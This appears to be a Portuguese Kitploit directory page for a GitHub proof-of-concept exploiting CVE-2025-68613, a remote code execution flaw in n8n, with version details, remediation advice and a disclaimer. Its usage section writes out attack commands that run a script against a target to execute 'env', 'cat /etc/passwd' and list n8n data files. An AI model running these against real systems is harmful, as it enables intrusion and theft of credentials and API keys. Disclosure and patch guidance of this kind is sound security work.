Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68613 — CVE-2025-68613 — RCE no n8n via Injeção de Expressão | Kitploit
Ferramentas/GitHubGitHub/h3raklez/cve-2025-68613
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubh3raklez/cve-2025-68613

CVE-2025-68613

CVE-2025-68613 — RCE no n8n via Injeção de Expressão

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68613 — RCE no n8n via Injeção de Expressão

Apenas para fins educacionais e de pesquisa de segurança autorizada.

Visão Geral

Vulnerabilidade crítica de RCE (CVSS 9.9) na plataforma de automação de workflows n8n. Usuários autenticados podem executar comandos arbitrários do SO através do nó executeCommand, ignorando as restrições da sandbox.

CampoDetalhe
CVECVE-2025-68613
CVSS9.9 (Crítico)
Versões afetadas>= 0.211.0 < 1.120.4
Autenticação necessáriaSim (qualquer usuário com permissões de criação de workflows)
Testado emn8n 1.119.1
Corrigido em1.120.4, 1.121.1, 1.122.0

Como funciona

O n8n avalia os parâmetros dos nós do workflow no lado do servidor. O nó executeCommand executa comandos shell diretamente no host com os privilégios do processo n8n. Qualquer usuário autenticado com permissões de criação ou edição de workflows pode abusar disso para obter RCE total.

Uso

root@kitploit:~
bash poc_final.sh <target> <email> <password> <command>

Exemplos:

root@kitploit:~
# Basic RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
root@kitploit:~
# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
root@kitploit:~
# Read sensitive files
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
root@kitploit:~
# List n8n data directory
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'

Nota: Se sua senha contiver caracteres especiais como !, use aspas simples.

Remediação

Atualize para n8n >= 1.120.4 imediatamente.

Se a atualização não for possível imediatamente:

  • Restrinja a criação e edição de workflows apenas a usuários totalmente confiáveis
  • Execute o n8n com privilégios mínimos de SO
  • Use segmentação de rede para limitar a exposição

Referências

  • n8n Security Advisory GHSA-v98v-ff95-f3cp
  • NVD — CVE-2025-68613

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal. O autor não se responsabiliza por qualquer uso indevido.

Baixar ferramenta